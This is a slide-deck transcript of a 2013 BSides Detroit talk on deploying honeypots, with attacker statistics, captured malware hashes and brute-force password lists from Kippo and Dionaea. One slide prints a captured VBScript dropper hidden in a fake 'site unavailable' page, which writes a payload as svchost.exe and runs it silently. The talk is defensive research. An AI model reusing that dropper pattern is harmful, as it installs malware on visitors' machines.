bsides detroit 2013 honeypots

64
Be vewy, vewy quiet…. let’s watch some hackers..

Upload: tazdrumm3r

Post on 04-Jul-2015

928 views

Category:

Technology


2 download

TRANSCRIPT

Page 1: Bsides detroit 2013   honeypots

Be vewy, vewy quiet….

let’s watch some hackers..

Page 2: Bsides detroit 2013   honeypots

Interactive portion intro

Whoami

What is a Honeypot?

Different Honeypots

Why Honeypots?

Things I discovered

Stratagem

Interactive portion end results

Page 3: Bsides detroit 2013   honeypots

Interactive portion

SSID – FBI MobileIP address – 192.168.2.5User ID – bsidesThe password is…detroit (told you it was easy)

Page 4: Bsides detroit 2013   honeypots

FatherHusband

Page 5: Bsides detroit 2013   honeypots

Geek

Antagonist of the shiny things

Page 6: Bsides detroit 2013   honeypots

ShadowServer.org volunteer

Security analyst

Whoami

Page 7: Bsides detroit 2013   honeypots

A Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)

Page 8: Bsides detroit 2013   honeypots

Why Honeypots?

Page 9: Bsides detroit 2013   honeypots

Why Honeypots?

Page 10: Bsides detroit 2013   honeypots

Low interactionServer Honeypots

HoneyD

Page 11: Bsides detroit 2013   honeypots

Low interactionServer Honeypots

Conpot

Page 12: Bsides detroit 2013   honeypots

Different Honeypots

Clientside Honeypots

Page 13: Bsides detroit 2013   honeypots

Windows XP SP 0 Windows Vista SP 0

Client HoneypotsHigh Interaction

Different Honeypots

Page 14: Bsides detroit 2013   honeypots
Page 15: Bsides detroit 2013   honeypots

Initial Research

Page 16: Bsides detroit 2013   honeypots

A word of advice on using an EC2 instance.

Page 17: Bsides detroit 2013   honeypots
Page 18: Bsides detroit 2013   honeypots

GeoIP locationDionaea - Ireland

Page 19: Bsides detroit 2013   honeypots

Dionaea stats

Started 3/7/2013Stopped 3/9/2013

Started 3/12/2013Stopped 3/14/2013

Graphs are courtesy of DionaeaFRtool

Page 20: Bsides detroit 2013   honeypots

Dionaea stats

• Don’t forget to add your API key from VirusTotal to your config file!!

• If you don’t add the API key, then the pretty visualization tool can’t do it’s job and you have to do manually!!!

Page 21: Bsides detroit 2013   honeypots

144

109

71

56

1714

14

99

8

Dionaea statsTop 10 IP addresses

Page 22: Bsides detroit 2013   honeypots

Wireshark AnalysisAttack Attempts

Page 23: Bsides detroit 2013   honeypots

Malware CapturesMD5 Virus Total

Detection Ratio

Common name Source IP Address/WhoIs

78c9042bbcefd65beaa0d40386da9f89

44 / 46 Microsoft -Worm:Win32/Conficker.C

• 209.190.25.37

• XLHost – VPS provider

• http://www.xlhost.com/

7acba0d01e49618e25744d9a08e6900c

45 / 46 Microsoft -Worm:Win32/Conficker.B

69.28.137.10LimeLight Networks - a Digital Presence Management companyhttp://www.limelight.com/

90c081de8a30794339d96d64b86ae194

42 / 43 Kaspersky -Backdoor.Win32.Rbot.aftu

69.38.10.83WindStream Communications –Voice and data providerhttp://NuVox.net

bcaef2729405ae54d62cb5ed097efa12

43 / 44 Kaspersky -Backdoor.Win32.Rbot.bqj

69.9.236.128Midwest Communications –Comcast/WideOpenWest parallelhttp://midco.net/

Page 24: Bsides detroit 2013   honeypots

GeoIP locationDionaea - recent

Page 25: Bsides detroit 2013   honeypots

Dionaea •Detection

Page 26: Bsides detroit 2013   honeypots

Dionaea •Detection

Page 27: Bsides detroit 2013   honeypots

Dionaea •Detection

Page 28: Bsides detroit 2013   honeypots

Kippo

Started 2/27/2013Stopped 3/1/2013

IP addresses• 14 unique IP addresses• Maximum password attempts – 1342• Successful logins – 7• Replay scripts – 1

•Files uploaded - 1

Page 29: Bsides detroit 2013   honeypots

1342

1190

454

163163

156

28 2216

54

1 1

Kippo stats

2/27 to 3/1

Attacker's IP addresses/connection attempts

Page 30: Bsides detroit 2013   honeypots

GeoIP locationKippo – recent

Page 31: Bsides detroit 2013   honeypots

Kippo statsro

ot

bin

ora

cle

test

nagio

s

mart

in

toor

ftpuser

user

postg

res

info

webm

aste

r

apache

backup

guest

r00t

public

gre

en

dem

o

sit

e

jeff

andy

i-heart

user0

conte

nt

1856

6717 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3

Top 25 User names

2/27 – 3/1

Times tried

Page 32: Bsides detroit 2013   honeypots

Kippo stats

27

16

9 9 98

7 7 7 7 7 7 7 7 7 7 76 6 6

Top 25 Passwords

2/27 to 3/1

Tries

Page 33: Bsides detroit 2013   honeypots

Kippo stats

Accounts that used 123456 as password

User ID Triesroot 7ftpuser 3oracle 3andy 2info 2jeff 2site 2test 2webmaster 2areyes 1brian 1

“7 successful logons? But your chart says 27 used the password of 123456?! WTF?”

Page 34: Bsides detroit 2013   honeypots

Kippo stats

root öÎÄ¥þ.òÄ¿Â¥ root !Q@W#E$root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$Rroot $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%root 654321 root !Q@W#E$R%Troot Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Yroot diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&root 123 root !Q@W#E$R%T^Y&Uroot 1234 root !Q@W#E$R%T^Y&U*root 12345 root !Q@W#E$R%T^Y&U*Iroot 1234567 root !Q@W#E$R%T^Y&U*I(root 12345678 root !Q@W#E$R%T^Y&U*I(Oroot 123456789 root !Q@W#E$R%T^Y&U*I(O)root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)Proot rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_

Interesting passwords

Page 35: Bsides detroit 2013   honeypots

Kippo statsFile downloaded

psyBNC 2.3.2

------------

This program is useful for people who cannot be on irc all the time. Its used to keep a connection to irc and your irc client connected, or also allows to act as a normal bouncer by disconnecting from the irc server when the client disconnects.

Page 36: Bsides detroit 2013   honeypots

Kippo

Started 5/31/2013Stopped 6/1/2013

IP addresses• Unique IP addresses - 20• Maximum password attempts – 1098• Successful logins – 16• Replay scripts – 4

•Files uploaded - 1

Page 37: Bsides detroit 2013   honeypots

670

398

273

9088

6462

2825

135 5 4

22

11

11

1

Kippo stats

5/31 to 6/1

Attackers IP addresses/connection attempts

Page 38: Bsides detroit 2013   honeypots

22

12

10 109 9 9 9

8 87 7 7 7

6 6 6 6 6 6 6 6 65 5

Top 25 passwords

5/31 to 6/1

Attempts

Kippo stats

Page 39: Bsides detroit 2013   honeypots

1184

17 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4

Top 25 user names

5/31 to 6/1

Login attempts

Kippo stats

Page 40: Bsides detroit 2013   honeypots

Kippo statsReplay script – 20130603-104907-9177.log

Just trying to run Perl

Page 41: Bsides detroit 2013   honeypots

Kippo statsReplay script – 20130530-134418-3935.log

Upload of shellbot.pl

Page 42: Bsides detroit 2013   honeypots

Kippo statsFile downloaded

#!/usr/bin/perl## ShellBOT by: devil__

Discovered: June 3, 2005Updated: April 30, 2010 3:46:09 AMType: TrojanSystems Affected:Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Backdoor.Shellbot is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer.

As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer.

Backdoor.ShellbotRisk Level 1: Very Low

Page 43: Bsides detroit 2013   honeypots

Kippo statsReplay script – 20130602-105723-5678.log

Upload a tar.gz and trips a Python reply script

Page 44: Bsides detroit 2013   honeypots

KippoDetection

CTF replay scripts

Page 45: Bsides detroit 2013   honeypots

Kippo

• Config file changes• Custom reply files

Lessons learned

Page 46: Bsides detroit 2013   honeypots

HoneyD

Page 47: Bsides detroit 2013   honeypots

Amun

Started 5/29 Stopped 5/30

IP addresses• Unique IP addresses - 3

• Files uploaded - 2

Page 48: Bsides detroit 2013   honeypots

Amun

Azenv.php (uploaded twice)

• ProxyJudge script

Files uploaded

Page 49: Bsides detroit 2013   honeypots

Thug

• Honeyclient• Mimics client behavior• Browser• Plug-ins for 3rd party apps

Page 50: Bsides detroit 2013   honeypots

Mwcrawler

PE32 files--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 445Infected files: 44Data scanned: 510.42 MBData read: 353.98 MB (ratio 1.44:1)Time: 147.925 sec (2 m 27 s)

Data--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 4Infected files: 1Data scanned: 1.04 MBData read: 0.41 MB (ratio 2.57:1)Time: 7.612 sec (0 m 7 s)

Page 51: Bsides detroit 2013   honeypots

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Untitled Document</title> </head><body>

Mwcrawler

<p align="center"><h1>We're sorry,</h1><h2>The site is temporarlyunavailable. Please check in next few days</h2></p></body></html><SCRIPT Language=VBScript><!--DropFileName = "svchost.exe“ WriteData =

<Lots of shellcode>

Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSetWSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>

Page 52: Bsides detroit 2013   honeypots

How you can your netbook useful and fun again!

Page 53: Bsides detroit 2013   honeypots

Project page

Goals◦ Documentation

Tools◦ Honeypots

◦ Network

◦ Malware

◦ Forensics

◦ Tools

Stratagemhttp://sourceforge.net/projects/stratagem/

Page 54: Bsides detroit 2013   honeypots

Honeypots◦ Dionaea

◦ Kippo

◦ Glastopf

◦ HoneyD

◦ Amun

◦ Labrea

◦ Tinyhoneypot

◦ Thug

◦ Conpot

Stratagem

Page 55: Bsides detroit 2013   honeypots

Network

◦ Scapy

◦ proxychains

◦ Ngrep

◦ Network Miner

◦ Amun

◦ Xplico

◦ Capanalysis

◦ Network

Malware

◦ Mwcrawler

◦ Yara

◦ ClamAV

Stratagem Forensics

◦ Volatility

Tools

◦ Tor

◦ i2p

◦ Conky

◦ Guake

◦ Terminator

Page 56: Bsides detroit 2013   honeypots

Stratagem

Capanalysis

Page 57: Bsides detroit 2013   honeypots

Stratagem

Capanalysis

Page 58: Bsides detroit 2013   honeypots

Next?

Page 59: Bsides detroit 2013   honeypots

Resources

• A host at $IP ($location)tried to log into my honeypot's fake Terminal Services server

• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypot's fake MSSQL

Server

http://inguardians.com/

Page 60: Bsides detroit 2013   honeypots

Resources

Page 61: Bsides detroit 2013   honeypots

Resources

Page 62: Bsides detroit 2013   honeypots

http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport

Page 63: Bsides detroit 2013   honeypots

Honeydrive

Page 64: Bsides detroit 2013   honeypots

Keith Dixon@Tazdrumm3r#misec – [email protected]://tazdrumm3r.wordpress.com